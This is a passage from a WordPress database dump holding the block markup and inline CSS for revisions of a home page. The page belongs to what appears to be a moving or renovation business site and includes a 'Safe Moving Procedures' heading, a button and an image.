.responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px  \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"f9f368f3-3d60-4546-bb21-46a4d6d60415\"} -->\n<style type=\"text/css\"> .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-f9f368f3-3d60-4546-bb21-46a4d6d60415 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"6c7f2244-b638-4062-a64f-a98f96e558ed\"} -->\n<style type=\"text/css\"> .block-6c7f2244-b638-4062-a64f-a98f96e558ed .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6c7f2244-b638-4062-a64f-a98f96e558ed .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6c7f2244-b638-4062-a64f-a98f96e558ed .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6c7f2244-b638-4062-a64f-a98f96e558ed .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6c7f2244-b638-4062-a64f-a98f96e558ed .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6c7f2244-b638-4062-a64f-a98f96e558ed\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"f9f78eae-449c-455e-8fdd-a5882512983b\",\"showHeading\":false,\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"separatorSpacingTablet\":35,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":0,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-seperator {\n margin-bottom: 35px !important; }\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-title-text {\n font-size: 0px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-f9f78eae-449c-455e-8fdd-a5882512983b\"><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Our Safe Moving<br>Procedures</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":30,\"blockId\":\"0924911c-74b7-4907-822b-208200e225a5\"} -->\n<style type=\"text/css\"> .block-0924911c-74b7-4907-822b-208200e225a5 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0924911c-74b7-4907-822b-208200e225a5 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0924911c-74b7-4907-822b-208200e225a5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-0924911c-74b7-4907-822b-208200e225a5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0924911c-74b7-4907-822b-208200e225a5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0924911c-74b7-4907-822b-208200e225a5\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\",\"counterId\":\"a3a7f8e1-d3ba-413d-9b6f-e963bd071379\",\"hPadding\":25,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 25px; padding-right: 25px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n@media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\">View All</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/skt-blocks-post-grid {\"postsToShow\":2,\"displayPostExcerpt\":false,\"displayPostAuthor\":false,\"postTitleTag\":\"h5\",\"readMoreText\":\"Read More\",\"bgColor\":\"#ffffff\",\"imageBorderRadius\":0,\"metaColor\":\"#6a6a6a\",\"readMoreLinkColor\":\"#fc8134\",\"titleColor\":\"#282828\",\"titleHoverColor\":\"#0d2e63\",\"contentPadding\":0,\"continueFontSize\":16,\"continueFontWeight\":\"600\",\"titleFontSize\":24,\"titleLineHeight\":1.2,\"titleFontWeight\":\"400\",\"metaFontSize\":16,\"metaFontWeight\":\"400\",\"metaTextTransform\":\"capitalize\",\"titleFontFamily\":\"Poppins\",\"metaFontFamily\":\"Poppins\",\"rowGap\":0,\"postGridBlockId\":\"89bc1d0c\"} /--></div></section></div>\n<!-- /wp:skt-blocks/section -->','Home','','inherit','closed','closed','','336-revision-v1','','','2022-08-22 20:09:07','2022-08-22 20:09:07','',336,'https://cteisys.com/?p=387',0,'revision','',0),(388,1,'2022-08-22 20:11:42','2022-08-22 20:11:42','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"f038c729-2cb3-48e6-a5f7-7ce0526e1314\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-1\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-1 skt-blocks-block-section-outer-wrap block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"a202d1b2-2693-46ac-9aac-5131073b5669\"} -->\n<style type=\"text/css\"> .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-a202d1b2-2693-46ac-9aac-5131073b5669 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"e922e93a-8271-4655-97bb-328ea23766a6\"} -->\n<style type=\"text/css\"> .block-e922e93a-8271-4655-97bb-328ea23766a6 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-e922e93a-8271-4655-97bb-328ea23766a6 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-e922e93a-8271-4655-97bb-328ea23766a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-e922e93a-8271-4655-97bb-328ea23766a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e922e93a-8271-4655-97bb-328ea23766a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-e922e93a-8271-4655-97bb-328ea23766a6\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":386,\"width\":257,\"height\":530,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image size-full is-resized is-style-default\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/32926267_2062360403778390_9097229843803668480_n.jpg\" alt=\"\" class=\"wp-image-386\" width=\"257\" height=\"530\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"a95a693b-83a8-40bc-b96a-96cca414adaf\",\"opacity\":100,\"backgroundColor\":\"#fe8333\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-quality-box\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-quality-box skt-blocks-block-section-outer-wrap block-a95a693b-83a8-40bc-b96a-96cca414adaf background-type-color alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf.background-type-video .skt-blocks-block-section {\n background-color: rgba(254, 131, 51, 1); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(254, 131, 51, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading 